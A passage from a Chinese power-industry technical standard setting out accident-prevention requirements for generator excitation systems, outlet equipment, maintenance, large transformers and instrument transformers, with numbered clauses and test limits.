适当位置设排气孔,排气孔上端应具有防止异物掉落的措施。 10.7.4.2 出线箱内应加装漏氢监测报警装置,当有漏氢指示时应及时查明原 因,当氢气含量达到或超过 1%时,应停机查漏消缺。 10.8 防止励磁系统故障引起设备损坏 10.8.1 防止集电环及直流母线故障 10.8.1.1 集电环小室内附属部件、固定螺栓应安装牢固,电缆应靠近小室边 缘布置,防止部件脱落掉入集电环与碳刷之间,引起集电环、碳刷故障。集电环 小室底部与基础台板间不应留有间隙,防止异物进入造成转子接地故障。 10.8.1.2 运行中应定期利用红外成像仪检查集电环及碳刷本体发热情况(重 点检查碳刷与集电环接触面附近温度),并测量碳刷载荷电流分布情况。当集电 环温升过高时应检查风路是否通畅、进口滤网是否堵塞;出现碳刷过热、载荷分 布不均或打火现象时,应对碳刷磨损情况、电刷是否抖动、弹簧压力是否正常、 刷盒安装间隙和位置情况进行检查和处理,必要时应利用频闪仪检查集电环表面 情况。若打火严重或形成环火,且无法消除时必须立即停机。 10.8.1.3 应明确碳刷长度更换标准,并使用制造厂家指定的或经过试验验证 的同一牌号电刷。碳刷使用前,应研磨使其接触面弧度与集电环表面一致,防止 碳刷接触不良引起打火、过热等故障,并应避免短时间内同一刷架更换多个碳刷。 10.8.1.4 加强对转子集电环、刷架系统的运行维护,及时清理积留的碳粉, 防止由于碳粉堆积导致集电环对地绝缘下降。 10.8.1.5 检修时应根据运行情况检查集电环表面伤蚀及椭圆度,存在异常及 超标情况应进行处理。停备时间较长时应对集电环采取涂抹硅脂等防锈措施,防 止集电环表面锈蚀造成碳刷与集电环接触不良。 10.8.1.6 机组检修期间应对交直流励磁母线箱内部进行清擦,检查相关连接 设备状态。机组投运前励磁绝缘应无异常变化。 113 10.8.2 防止励磁调节器故障引起发电机损坏 10.8.2.1 进相运行的发电机,其低励限制的定值应根据发电机进相试验实测 值设定且在制造厂给定的容许值及保持发电机静稳定的范围内,并定期校验。 10.8.2.2 自动励磁调节器的过励限制和过励保护的定值应在制造厂给定的 容许值内,并定期校验。 10.8.2.3 励磁调节器的自动通道发生故障时应及时修复并投入运行。严禁发 电机在手动励磁调节(含按发电机或交流励磁机的磁场电流的闭环调节)下长期 运行。在手动励磁调节运行期间,在调节发电机的有功负荷时必须先适当调节发 电机的无功负荷,以防止发电机失去静态稳定性。 10.8.2.4 机组起动、停机和相关试验过程中,应有机组低转速时切断发电机 励磁的措施。 10.8.2.5 机组检修期间,应对灭磁开关进行检查,触头接触压力、触头烧伤 面积和烧伤深度应符合产品要求,必要时进行更换。 10.8.3 防止励磁变压器故障损坏发电机 10.8.3.1 励磁变压器引线各部件装配尺寸应符合设计要求。低压绕组引出线 裸露铜排(尤其是靠近铁心拉板的铜排),应喷绝缘涂料或加装绝缘带、绝缘热 缩套,防止短路故障。 10.8.3.2 励磁变压器外罩应能有效防止异物落入、小动物进入、进水短路等, 做好预防措施。机组检修时,应对励磁变压器铁心和线圈的固定夹件、绝缘垫块 以及连接螺栓等进行检查紧固,防止铁心线圈松动位移或零部件脱落引起短路故 障。 10.9 防止出线及外部回路设备故障 10.9.1 防止出线故障导致发电机跳机或损坏 10.9.1.1 对于采用新工艺和新结构的出线套管,在采购过程中应加强对套管 的选型和质量要求。制造厂在供货过程中加强对套管的质量管控并提供全套技术 资料。 10.9.1.2 套管现场安装或更换前应按照规程要求单独进行相关试验检查,套 管与引出线连接螺栓应按照厂家提供的力矩要求进行紧固,紧固后的接触电阻应 符合要求。 10.9.1.3 对于水冷套管,运行中应严密监测出线套管处的出水温度。若出线 114 套管出水温度高于线棒的平均出水温度,或出现异常增长或波动,应及时查明原 因并处理。 10.9.1.4 对于氢气冷却套管,运行中应加强密封油的管理,防止密封油沉积 堵塞套管风冷回路,导致套管过热。 10.9.1.5 运行中应定期开展套管及其接头部位的温度检测,对于封闭在出线 箱内不能直接检测的套管,可采取加装无线测温或红外测温装置等措施进行监 测。 10.9.1.6 检修时,应对出线套管进行检查、清洁,氢冷套管要特别注意内部 风道积油的检查和清理,并按照规程要求连同定子绕组开展相关试验,必要时单 独对套管进行试验检查。按照厂家说明书规定周期更换套管相关密封组件。 10.9.1.7 发电机出线软连接设计时应保证其热伸缩性能、机械性能、电气性 能满足负荷变化的需要并留有足够裕度。现场安装时应严格按照制造厂图纸进 行,防止运行中异常受力。检修时应对软连接进行检查,出现松动、位移、断裂、 过热等情况时应查明原因并处理。 10.9.2 防止出口电压互感器故障 10.9.2.1 出口电压互感器选型时,应保证相关参数留有足够裕度。采购后应 根据规程要求严格开展交接试验,同台套产品应保证性能一致。 10.9.2.2 机组检修时,宜开展出口电压互感器一、二次线圈直流电阻及一次 保险直流电阻测试,一、二次回路接线检查等检修项目,及时发现设备隐患并处 理。应定期开展空载电流测量,试验周期不超过 3 年;大修时应进行交流耐压、 局部放电试验,对分级绝缘式的电压互感器应进行倍频感应耐压试验。 10.9.2.3 运行中,定期开展红外测温和外观检查,环氧浇注干式互感器外绝 缘如有裂纹、沿面放电、局部变色、变形,应立即更换。 10.9.3 防止离相封闭母线故障 10.9.3.1 机组安装、检修时,应对室外封闭母线密封情况重点检查,对封闭 母线内部附属设施(如伴热带、密封条、电源线、互感器二次线等)应注意检查 其布置和接线是否满足规范要求,安装是否牢固。封闭母线外壳封闭前,应对内 部进行全面清洁,防止封母内留有异物。 10.9.3.2 应按照相关标准要求,开展离相封闭母线的维护、检修及防结露装 置的配置和运行管理,防止母线受潮凝露、异常放电等导致机组跳机。 115 10.9.3.3 使用微正压装置的机组,运行中应注意微正压装置单位时间启停次 数、压力保持时间,辅助判断母线密封性是否良好。封闭母线密封性下降时,应 根据母线密封情况调整微正压装置的运行方式,避免微正压装置长时间充气或频 繁启动造成设备损坏,并及时利用检修机会对母线进行密封性改造。 10.9.3.4 采用微正压充气(或微风循环)的封闭母线最低处应设置排污装置, 定期检查是否堵塞、积液,并及时排污。不采用微正压充气(或微风循环)的自 然冷却封闭母线应在母线最低处通过干燥器与大气连通,并定期检查干燥剂变色 情况。 10.10 防止非正常运行造成设备损坏 10.10.1 防止发生非同期并网 10.10.1.1 微机自动准同期装置应安装独立的同期检定闭锁继电器,同期闭 锁继电器应同时具备压差、频差、角差检查闭锁功能。对于新建或改造的同期装 置,宜选择双通道相互闭锁的同期装置。 10.10.1.2 新投产、大修机组及同期回路(包括交流电压回路、直流控制回 路、整步表、自动准同期装置及同期把手等)发生改动或设备更换的机组,在第 一次并网前应进行以下工作: (1) 对装置及同期回路进行全面的校核、传动; (2) 利用发变组升压或发变组带空载母线升压试验,校核同期电压检测二次 回路的正确性,并对整步表及同期检定继电器进行实际校核,对于不具备升压条 件的,可利用系统倒送电进行; (3) 进行机组假同期试验,试验应包括自动准同期合闸试验、同期(继电器) 闭锁等内容。 10.10.1.3 自动准同期装置不正常时不应强行手动准同期并网,自动准同期 合闸脉冲宜与同期闭锁继电器接点串联后出口。 10.10.1.4 为防止发生非同期并网,应保证机组并网点断路器机械特性满足 规程要求。 10.10.2 防止发生非全相运行 10.10.2.1 采用发变组接线方式的新建 220kV 及以下电压等级机组,并网断 路器应选用机械联动的三相操作断路器。 10.10.2.2 与 220kV 及以上系统连接的机组,出现断路器非全相运行时,应 116 及时启动断路器失灵保护。 10.10.2.3 发变组各断路器检修时应检查其三相动作一致性是否合格,接触 是否良好。 10.10.2.4 断路器检修时校验发变组各断路器非全相保护回路的完好性,以 保证出现非全相时断路器可靠断开。 10.10.3 防止发生误上电 10.10.3.1 300MW 及以上机组应配置发电机误上电保护并定期校验,机组解 列后应能自动投入,并网后应能自动退出。 10.10.3.2 发变组并网断路器和隔离开关做好日常检查和维护,停机解列后 应就地检查开关是否分合到位。 10.10.3.3 机组停机状态下,应做好高厂变低压侧开关误合闸的防范措施, 防止通过厂用分支将发电机误上电。 10.10.3.4 厂站直流系统应做好防止一点和两点接地的措施,及时排除接地 点,防止因控制回路原因引起机组各断路器误合闸。 10.10.3.5 机组误上电保护出口,跳开并网断路器时,应同时启动断路器失 灵保护,避免断路器失灵引起机组继续上电。 10.10.4 防止发生次/超同步振荡 10.10.4.1 存在的次/超同步振荡风险的机组,应做好抑制和预防机组次/超同 步振荡的措施,同时应装设次/超同步振荡监测及保护装置(参见 5.1.9)。 10.10.4.2 应做好机组轴系扭振保护装置(或监测装置)的数据记录和机组 轴系疲劳累计与状态分析,必要时进行检测评估,及时采取相应措施。 10.11 防止水轮发电机启停故障 10.11.1 水轮发电机解列时,发电机出口断路器应先于磁场断路器断开,防 止机组解列前失磁。 10.11.2 水轮发电机电气制动应在机组励磁退出且机械制动投入后退出。 10.11.3 抽蓄机组新机设计时,发电机出口断路器应具备低频开断故障电流 的能力,最小开断频率不高于 20Hz,制造厂供货时应提供相应的型式试验报告。 10.11.4 新建常规水轮发电机及抽蓄发电电动机出口 SF6 断路器宜装设灭弧 触头剩余电气寿命监测装置以及灭弧室外壳温度监测装置,在运电站可结合实际 情况进行改造。 117 10.11.5 抽蓄机组背靠背调相启动时,应设计有防止拖动机组出口断路器开 断允许频率范围外故障电流的措施。 10.11.6 抽蓄机组发电机电压设备操动机构(含断路器、隔离开关、接地开 关)应配置足够的常开和常闭的辅助位置接点供外部用户的控制、信号及联动回 路用,新建项目不允许通过中间继电器扩展。 10.11.7 水轮发电机组电气制动设计应采取防止电气制动刀闸(或开关)三 相不一致合闸情况下投入励磁的措施。 10.11.8 常规水电站及抽蓄机组应定期检查频繁操作的隔离刀闸本体操作拉 杆是否松动或变形,防止隔离刀闸拒动。 10.12 加强在线监测装置运行管理 10.12.1 应根据机组冷却方式和容量等级、运行工况特点制定在线监测装置 配置方案,具体装置选型时,应对设备技术可行性及适用性进行论证确认。监测 装置报警信号宜接入机组分散控制系统(DCS)统一监测。 10.12.2 安装过程中,与高压设备直接相连的元部件,应保证安装稳固,绝 缘可靠,二次回路不应在一次回路内部走线,宜采用最短距离直接引出。 10.12.3 与氢气回路相连的监测管道,应满足密封性和防爆要求。 10.12.4 机组投运后应对在线监测装置进行功能核对,确保装置软硬件功能 正常,运行中应对装置运行状态和监测数据进行定期检查。 10.12.5 机组检修中,应对测温元件、局放耦合装置等直接安装在一次设备 上的元件进行检查及相关试验。对于监测装置所用表计应开展定期校验。 10.13 防止检修不当造成设备损坏 10.13.1 防止机内遗留异物 10.13.1.1 规范检修区域进出人员管理,严格执行人员进出记录和工具登记 制度,作业期间设置值班岗位,非作业期间应做好场地封闭措施。进入膛内工作 人员应着无金属的连体服和软底鞋。工作完毕撤出时清点物品正确,确保无遗留 物品。 10.13.1.2 规范现场检修、试验等环节的标准化管理,防止锯条、螺钉、螺 母、工具、试验材料等异物遗留定子内部,特别应对端部线圈的夹缝、上下渐伸 线之间位置作详细检查。对于进行水系统检修的,还应防止临时封堵材料、焊渣 等异物进入水系统。 118 10.13.1.3 定、转子表面喷漆前,做好其表面油污清理工作。防止运行中漆 皮脱落,造成定、转子通风孔堵塞。 10.13.1.4 穿转子前,应对膛内进行全面清理和检查。 10.13.2 防止发生磕碰及机械损伤 10.13.2.1 在定子膛内施工前,应在膛内铺设橡胶垫,防止铁心受损或异物 遗留。 10.13.2.2 在抽穿转子前,应做好防止转子跌坠、磕碰定子的技术措施,并 严格控制作业流程。 10.13.2.3 人员进入膛内作业时,禁止踩踏引水管及接头、线棒绝缘盒、连 接梁等部位。 10.13.2.4 检修中加强对端部紧固件检查(如压板紧固螺栓、支架固定螺栓、 引线夹板螺栓、汇流管所用卡板和螺栓、定子铁心穿心螺杆等),防止相关部件 运行中松动脱落。 10.13.2.5 转子风叶装配时应按照制造厂的力矩要求进行安装,防止运行中 脱落造成定子损伤。 11 防止发电机励磁系统事故的重点要求 11.1 励磁系统设计的重点要求 11.1.1 励磁系统应保证良好的工作环境,环境温度、湿度不得低于相关标准 规定要求。励磁调节器与励磁变压器不应置于同一个没有隔断的场地内。励磁设 备(含励磁变压器和励磁小间)上方及附近不得布置水管道,如有布置则应采取 防止漏水的隔离措施。整流柜冷却通风入口应设置滤网,励磁调节器及功率整流 柜所在的励磁小间应具备必要的防尘降温措施。 11.1.2 励磁系统中两套励磁调节器的电压回路应相互独立,使用机端不同电 压互感器(PT)的二次绕组,防止其中一个故障引起发电机误强励。励磁调节 器原则上应具有防止电压互感器(PT)高压侧熔丝熔断引起发电机误强励的措 施。 11.1.3 励磁系统的灭磁能力应达到国家及行业标准要求,且灭磁装置应具备 独立于调节器及功率整流装置的灭磁能力。灭磁开关的弧压应满足机组故障灭磁 及误强励灭磁的要求。 119 11.1.4 励磁变压器不应采取高压熔断器作为保护措施。励磁变压器保护定值 应与励磁系统强励能力相配合,防止强励时保护误动作。 11.1.5 励磁变压器的绕组温度应具有有效的监视手段,监视其温度在设备允 许的范围之内,并具备将温度信号传至远方的功能。有条件的可装设铁芯温度在 线监视装置。 11.1.6 当励磁系统中过励限制、低励限制、定子过压或过流限制和伏/赫兹 限制(V/Hz限制)的控制失效后,应由相应的发变组保护完成解列及灭磁。 11.1.7 励磁系统设备选型应考虑所在电网运行需求和稳定控制要求,性能指 标应满足相关标准的要求;励磁调节器应通过涉网性能检测试验的检验;励磁调 节器控制模型应满足相关标准的要求。未进行涉网性能检测试验且频繁出现故障 的励磁调节器,应考虑整体换型改造。 11.1.8 当接入机组故障录波器、同步相量测量装置(PMU)等监测系统的 励磁电流和励磁电压信号采用变送器输出时,励磁电压输出信号应有一定负值量 显示,正向输出信号最大值应不低于额定励磁电压的2倍;励磁电流输出信号最 大值应不低于额定励磁电流的2倍。 11.2 励磁系统基建安装及设备改造的重点要求 11.2.1 励磁变压器高压侧封闭母线外壳用于各相别之间的安全接地连接应 采用大截面金属板。 11.2.2 发电机转子接地保护装置原则上应安装于励磁系统柜。接入保护柜或 机组故障录波器的转子正、负极连接电缆应采用高绝缘的电缆且不能与其它信号 共用电缆。所用电缆的绝缘耐压水平应满足相关标准规定要求。 11.2.3 励磁系统的二次控制电缆均应采用屏蔽电缆,电缆屏蔽层应可靠接 地。 11.2.4 励磁系统设备改造后,应进行阶跃扰动性试验和各种限制环节的试 验,确认励磁系统工作正常,满足相关标准的要求,并按相关部门要求完成励磁 系统建模试验及电力系统稳定器(PSS)整定投入试验。控制程序更新升级前, 对旧的控制程序和参数进行备份,升级后进行空载试验及新增功能或改动部分功 能的测试,确认程序更新后励磁系统功能正常。做好励磁系统改造或程序更新前 后的试验记录并备案。 120 11.3 励磁系统调整试验的重点要求 11.3.1 新建或改扩建机组及励磁系统改造后的机组,应由具备资质的电力试 验单位按照相关标准,完成发电机励磁系统参数测试及建模试验。试验前应制定 完善的技术方案和安全措施上报相关管理部门备案,试验后自动电压调节器 (AVR)模型及最终整定参数应书面报告相关调度部门。 11.3.2 新建或改扩建机组及励磁系统改造后的机组,PSS装置的定值设定和 调整应由具备电力调试/试验资质的科研单位或相关调度部门认可的技术监督单 位按照相关标准进行。试验前应制定完善的技术方案和安全措施上报相关管理部 门备案,试验后电力系统稳定器(PSS)的传递函数及自动电压调节器(AVR) 最终整定参数应书面报告相关调度部门。 11.3.3机组大修(或A/B级检修)后,应进行发电机空载和负载阶跃扰动性 试验,检查励磁系统动态指标是否达到标准要求。试验前应编写包括试验项目、 安全措施和危险点分析等内容的试验方案并经批准。 11.3.4 励磁系统的V/Hz限制环节特性应与发电机或变压器过激磁能力低者 相匹配,应在发电机组对应继电保护装置跳闸动作前进行限制。V/Hz限制环节 在发电机空载和负载工况下都应正确工作。 11.3.5 励磁系统如设有定子过压限制环节,应与发电机过压保护定值相配 合,该环节应在机组保护之前动作。 11.3.6 励磁系统低励限制环节的限制值应根据进相试验结果,并考虑发电机 电压影响进行整定,与发电机静态稳定极限和失磁保护相配合,在保护跳闸之前 动作。当发电机进相运行受到扰动瞬间进入励磁调节器低励限制环节工作区域 时,不允许发电机组进入不稳定工作状态。 11.3.7 励磁系统的过励限制(即过励磁电流反时限限制和顶值电流瞬时限 制)环节的特性应与发电机转子的过负荷能力相一致,并与发电机保护中转子过 负荷保护定值相配合,在保护跳闸之前动作。 11.3.8 励磁系统如设置有定子电流限制环节,则定子电流限制环节的特性应 与发电机定子的过电流能力相一致,并与发电机保护中定子过负荷保护定值相配 合,在保护跳闸之前动作。 11.3.9 励磁系统应具有无功调差功能,设置合理的无功调差系数并投入运 121 行。接入同一母线的发电机在并列点处(补偿主变压器电抗压降后)的电压调差 特性应基本一致。机端并列的发电机无功调差系数应不小于+5%。 11.3.10应按照相关标准要求,定期进行励磁系统涉网性能复核性试验,包括 励磁调节器参数建模复核性试验和电力系统稳定器(PSS)性能复核性试验,复 核周期应不超过5年。 11.3.11 灭磁开关应结合机组检修,进行断口触头接触电阻、分合闸线圈直 流电阻、分合闸动作电压、分合闸时间测试等试验,试验结果应符合厂家规定。 11.3.12 灭磁开关应按厂家规定的运行时间或动作次数进行解体检查,检查 开关动、静触头接触面是否符合要求、机械部分是否出现磨损、开裂等。发现问 题及时予以更换。 11.4 励磁系统运行安全的重点要求 11.4.1 并网机组励磁系统应在自动方式下运行。如励磁系统故障或进行试验 需退出自动方式,必须及时报告调度部门。 11.4.2 励磁调节器的自动通道发生故障时应及时修复并投入运行。严禁发电 机在手动励磁调节(含按发电机或交流励磁机的磁场电流或磁场电压闭环调节) 下长期运行。在手动励磁调节运行期间,在调节发电机的有功负荷时必须先适当 调节发电机的无功负荷,以防止发电机失去静态稳定性。 11.4.3 进相运行的发电机励磁调节器应投入自动方式,低励限制环节必须投 入。 11.4.4 励磁系统各限制和保护的定值应在发电机安全运行允许范围内,并在 机组B级及以上检修时校验。 11.4.5 修改励磁系统参数必须严格履行审批手续,在书面报告技术监督单位 和调度有关部门审批并进行相关试验后,方可执行,严禁随意更改励磁系统参数 设置。 11.4.6 利用自动电压控制系统(AVC)对发电机调压时,受控机组励磁系统 应投入自动方式。 11.4.7 励磁系统设备的日常巡视,检查内容至少包括:励磁调节器各项功能 指示正常;励磁变压器各部件温度应在允许范围内;整流柜的均流系数满足相关 标准的规定要求、散热风机运行正常、温度无异常、通风孔滤网无堵塞;发电机 122 或励磁机转子碳刷磨损情况在允许范围内、滑环火花不影响机组正常运行等。 11.4.8 励磁系统电源模块应定期检查,且备有经检测功能完好的备件,发现 异常时应及时予以更换。励磁调节器所用的电源模块原则上应在运行6年后予以 更换。 11.4.9对于励磁调节器所用的电压互感器和一次保险应定期检查,发现异常 及时予以更换。 11.4.10 励磁系统调节器运行12年后,应全面检查板件、电子元器件情况, 发现异常应及时更换。 11.4.11 励磁系统整流器功率元件运行15年后,经评估存在整流异常或无法 及时消除的缺陷等运行风险,应及时更换或改造。 12 防止大型变压器和互感器损坏事故的重点要求 12.1 防止变压器出口短路事故 12.1.1 240MVA及以下容量变压器应选用通过短路承受能力试验验证的相似 产品;500kV变压器或240MVA以上容量变压器应优先选用通过短路承受能力试 验验证的相似产品。生产厂家应提供同类产品短路承受能力试验报告或短路承受 能力计算报告。在变压器设计阶段,应取得所订购变压器的短路承受能力校核报 告。220kV及以上电压等级的变压器还应取得抗震计算报告。 12.1.2 高压厂用变不宜选用有载调压方式,确需采用时,分接开关应选用单 相调压开关,且应与绕组就近布置。 12.1.3 220kV及以下主变压器的6~35kV中(低)压侧引线、户外母线(不含 架空母线)及接线端子应绝缘化;500(330)kV变压器35kV套管至母线的引线 宜绝缘化;变电站出口2km内的10kV架空线路应采用绝缘导线。 12.1.4 变压器受到近区短路冲击未跳闸时,应立即进行油中溶解气体组分分 析,并加强跟踪,同时注意油中溶解气体组分数据的变化趋势,若发现异常,应 及时安排停电检查;若通过故障录波或监测装置判断短路电流峰值超过变压器能 够承受的短路电流峰值的70%时,应尽早安排停电检查。变压器受到近区短路冲 击跳闸后,应开展油中溶解气体组分分析、绕组电阻测量、绕组变形(绕组频率 响应、低电压短路阻抗、电容量)及其他诊断性试验,综合判断无异常后方可投 123 入运行。 12.2 防止变压器绝缘事故 12.2.1 工厂试验时应将实际供货的套管安装在变压器上进行试验;所有附件 在出厂时均应按实际使用方式经过整体预装。 12.2.2 出厂局部放电试验测量电压为1.58Ur/ 3 时,110(66)kV电压等级 变压器高压端的视在放电量不大于100pC;220kV~500kV电压等级变压器高、中 压端的视在放电量不大于100pC;750kV~1000kV电压等级变压器高压端的视在 放电量不大于100pC,中压端的视在放电量不大于200pC,低压端的视在放电量 不大于300pC。强迫油循环变压器出厂试验时还应在潜油泵全部开启时(除备用 潜油泵)进行局部放电试验,试验电压为1.58Ur/ 3 ,局部放电量应小于以上的 规定值。500kV及以上并联电抗器在进行出厂温升试验时,应进行局部放电监测。 12.2.3 生产厂家首次设计、新型号或有运行特殊要求的220kV及以上电压等 级变压器在首批次生产系列中应进行例行试验、型式试验和特殊试验(承受短路 能力的试验视实际情况而定)。 12.2.4 500kV及以上并联电抗器的中性点电抗器出厂试验应进行感应耐压试 验(IVW)。 12.2.5 充气运输及现场保存的变压器应监视气体压力,压力低于0.01MPa时 要补干燥气体。现场充气保存时间不应超过3个月,否则应注油保存,并装上储 油柜。 12.2.6 强迫油循环变压器安装结束后,应按顺序开启全部油泵进行油循环, 并经充分静放、排气后方可进行交接试验。 12.2.7 110(66)kV及以上电压等级的变压器在新安装时应进行现场局部放 电试验;对110(66)kV电压等级变压器在新安装时应抽样进行额定电压下空载 损耗试验和负载损耗试验;如有条件时,500kV并联电抗器在新安装时可进行现 场局部放电试验。现场局部放电试验验收,应在所有额定运行油泵(如有)启动 以及工厂试验电压和时间下,110(66)kV电压等级变压器高压端的局部放电量 不大于100pC;220~500kV电压等级变压器高、中压端的局部放电量不大于100pC; 750~1000kV电压等级变压器高压端的局部放电量不大于100pC,中压端的局部放 电量不大于200pC,低压端的局部放电量不大于300pC。 124 12.2.8 变压器在交接或者大修后可采取单相加压方式进行局部放电测量,有 条件时,可采取三相加压测量。 12.2.9 110(66)kV及以上电压等级变压器、50MW及以上机组配置的高压 厂用变压器在出厂和投产前,应用频响法和低电压短路阻抗法测试绕组变形,并 留原始记录。 12.2.10 高压厂用变宜在交接和大修后开展带有局部放电测量的感应电压试 验(IVPD)。 12.2.11 加强变压器运行巡视,应特别注意变压器冷却器潜油泵负压区出现 的渗漏油,如果出现渗漏应切换停运冷却器组,进行堵漏消除渗漏点。 12.2.12 对运行10年以上且负载率长期运行在90%以上的变压器,应进行一 次油中糠醛含量测试。不同油基、牌号、添加剂类型的油原则上不宜混合使用; 如必须混合使用时,参与混合的新油(或运行中油)应符合各自的质量标准,且 应预先进行相关试验。 12.2.13 220kV及以上电压等级变压器拆装套管需内部接线或进人后,应进行 现场局部放电试验。 12.2.14 积极开展红外检测,新建、改扩建或大修后的变压器(电抗器), 应在投运带负荷后不超过1个月(但至少在24小时以后)进行一次精确检测。 220kV及以上电压等级的变压器(电抗器)每年在夏季前后应至少各进行一次精 确检测。在高温大负荷运行期间,对220kV及以上电压等级变压器(电抗器)应 增加红外检测次数。精确检测的测量数据和图像应制作报告存档保存。 12.3 防止变压器保护事故 气体继电器、油流速动继电器、压力释放阀在新安装和变压器大修时应进行 校验,并检查相关的二次接线盒、端子箱防水及密封情况,防止二次回路受潮短 路。 12.4 防止分接开关事故 12.4.1 油浸式真空有载分接开关轻瓦斯报警后应暂停调压操作,并对气体和 绝缘油进行色谱分析,根据分析结果确定恢复调压操作或进行检修。 12.4.2 无励磁分接开关在改变分接位置后,必须测量使用分接的直流电阻和 变比。 125 12.5 防止变压器套管事故 12.5.1 如套管的伞裙间距低于规定标准,应采取加硅橡胶伞裙套等措施。在 严重污秽地区运行的变压器,宜采取在瓷套涂防污闪涂料等措施。 12.5.2 处于8度及以上地震烈度区域的110kV及以上变压器和500kV及以上 高压并联电抗器高压侧套管不应选用卡装式瓷绝缘套管,宜选用通过抗震试验的 无机粘接的胶装式瓷绝缘套管(耐受地震波水平峰值加速度不低于主变所处地震 烈度区域的水平最大峰值加速度)。 12.5.3 油纸电容套管在最低环境温度下不应出现负压,制造厂应明确规定套 管可取绝缘油总量。 12.5.4 运行中变压器套管油位视窗无法看清时,继续运行过程中应按周期结 合红外成像技术掌握套管内部油位变化情况,防止套管事故发生。 12.6 防止冷却系统事故 12.6.1 强油循环结构的潜油泵启动应逐台启用,延时间隔应在30秒以上,以 防止气体继电器误动。 12.6.2 对目前正在使用的单铜管水冷却变压器,应始终保持油压大于水压, 并加强运行维护工作,同时应采取有效的运行监视方法,及时发现冷却系统泄漏 故障。 12.6.3 强迫油循环变压器内部故障跳闸后,潜油泵应同时退出运行。 12.7 防止变压器火灾事故 12.7.1 排油注氮灭火装置应满足: (1)对于重锤结构,采用电磁铁驱动脱扣结构的,排油及注氮阀动作线圈 功率应大于DC220V×1.5A;采用电磁铁直接支撑结构的,排油及注氮阀动作线 圈功率应大于DC220V×3A; (2)对于采用其他结构的注氮阀,注氮阀动作线圈功率应大于 DC220V×1.5A; (3)注氮阀与排油阀间应设有机械连锁阀门; (4)动作逻辑关系应满足本体重瓦斯保护、主变断路器开关跳闸、油箱超 压开关(火灾探测器)同时动作时才能启动排油充氮保护。 12.7.2 当采用水喷雾灭火系统时,应满足以下要求: 126 (1)水喷雾控制回路继电器动作功率应大于8W。 (2)动作逻辑关系应满足变压器火灾探测器与变压器断路器开关跳闸同时动作。 12.7.3 变压器固定灭火装置进行远方或就地手动操作时,应能够实现一键启 动,不应串入气体继电器、压力释放阀及各侧断路器的接点。 12.7.4 励磁变压器上方不宜布置水管道,若无法避免应采取防水隔离措施。 12.7.5 当采用泡沫灭火系统时,宜采用泵组式泡沫喷雾灭火系统,具备先期 采用泡沫快速灭火、后期采用水喷雾持续降温的功能。 12.7.6 应结合例行试验检修,定期对灭火装置进行维护和检查,以防止误动 和拒动。 12.7.7 现场进行变压器干燥时,应做好防火措施,防止加热系统故障或线圈 过热烧损。 12.7.8 应定期对变压器固定灭火系统进行维护保养,并结合变压器停电检修 工作进行灭火系统功能测试,防止误动和拒动。维护保养检测人员应具备相应等 级消防设施操作员(消防设施检测维护保养职业方向)资格和高压电工从业资格。 12.8 防止互感器事故 12.8.1 防止各类油浸式互感器事故 12.8.1.1 新采购的电容式电压互感器电磁单元油箱工艺孔应高出油箱上平 面10mm以上,且密封可靠。 12.8.1.2 所选用电流互感器的动、热稳定性能应满足安装地点系统短路容量 的远期要求,一次绕组串联时也应满足安装地点系统短路容量的要求。 12.8.1.3 电容式电压互感器的中间变压器高压侧不应装设金属氧化物避雷 器(MOA)。 12.8.1.4 110(66)kV~750kV油浸式电流互感器在出厂试验时,局部放电试 验的测量时间延长到5min。 12.8.1.5 电容式电压互感器宜选用速饱和电抗器型阻尼器,并应在出厂时进 行0.8Un、1.0Un、1.2Un及1.5Un的铁磁谐振试验(注:Un指额定一次相电压)。 12.8.1.6 电流互感器的一次端子所受的机械力不应超过规定的允许值。互感 器的二次引线端子和末屏引出线端子应有防转动措施。 12.8.1.7 110(66)kV及以上电压等级的油浸式电流互感器,应逐台进行交 127 流耐受电压试验,交流耐压试验前后应进行油中溶解气体分析。 12.8.1.8 对于220kV及以上等级的电容式电压互感器,其耦合电容器部分是 分成多节的,安装时必须按照出厂时的编号以及上下顺序进行安装,严禁互换。 12.8.1.9 220kV及以上电压等级油浸式电流互感器运输时,应在每辆车的产 品上至少安装一台冲击记录仪。设备运抵现场后应检查确认,记录数据超过5g 应进行评估,超过10g应返厂检查。110kV及以下电压等级电流互感器应直立运 输。 12.8.1.10 故障抢修安装的油浸式互感器,应保证绝缘试验前静置时间,其 中500(330)kV~750kV设备静置时间应大于36h,110(66)kV~220kV设备静置 时间应大于24h。 12.8.1.11 对新投运的220kV及以上电压等级电流互感器,1~2年内应取油样 进行油色谱、微水分析;对于厂家明确要求不取油样的产品,确需取样或补油时 应由制造厂配合进行。 12.8.1.12 对硅橡胶套管和加装硅橡胶伞裙的瓷套,应经常检查硅橡胶表面 有无放电或老化、龟裂现象,如果有应及时处理。 12.8.1.13 油浸倒立式电流互感器漏油应停止运行。 12.8.1.14 如运行中互感器的膨胀器异常伸长顶起上盖,应立即退出运行。 当互感器出现异常响声时应退出运行。当电压互感器二次电压异常时,应迅速查 明原因并及时处理。 12.8.1.15 根据电网发展情况,应注意验算电流互感器动热稳定电流是否满 足要求。若互感器所在变电站短路电流超过电流互感器铭牌规定的动热稳定电流 值时,应及时改变变比或安排更换。 12.8.2 防止110(66)kV~500kV SF6绝缘电流互感器事故 12.8.2.1 SF6密度继电器与互感器设备本体之间的连接方式应满足不拆卸校 验密度继电器的要求,户外安装应加装防雨罩。 12.8.2.2 互感器出厂时必须逐台进行各项试验,包括局部放电试验和耐压试 验。 12.8.2.3 制造厂应采取有效措施,防止运输过程中内部构件震动移位。用户 自行运输时应按制造厂规定执行。 128 12.8.2.4 110kV及以下互感器推荐直立安放运输,220kV及以上互感器必须满 足卧倒运输的要求。运输时110(66)kV产品每批次超过10台时,每车装10g振 动子2个,低于10台时每车装10g振动子1个;220kV产品每台安装10g振动子1个; 330kV及以上每台安装带时标的三维冲撞记录仪。到达目的地后检查振动记录装 置的记录,若记录数值超过10g一次或10g振动子落下,则产品应返厂解体检查。 12.8.2.5 气体绝缘的电流互感器安装后应进行现场老炼试验。老炼试验后进 行耐压试验,试验电压为出厂试验值的80%。条件具备且必要时还宜进行局部放 电试验。 12.8.2.6 互感器安装时,应将运输中膨胀器限位支架等临时保护措施拆除, 并检查顶部排气塞密封情况。 12.8.2.7 运行中应巡视检查气体密度表,产品年漏气率应小于0.5%。 12.8.2.8 气体绝缘互感器严重漏气导致压力低于报警值时应立即退出运行。 运行中的电流互感器气体压力下降到0.2MPa(相对压力)以下,检修后应进行 老练和交流耐压试验。 12.8.2.9 交接时SF6气体含水量小于250μL/L。运行中不应超过500μL/L(换 算至20℃),若超标时应进行处理。 12.8.2.10 对长期微渗的互感器应重点开展SF6气体微水量的检测,必要时可 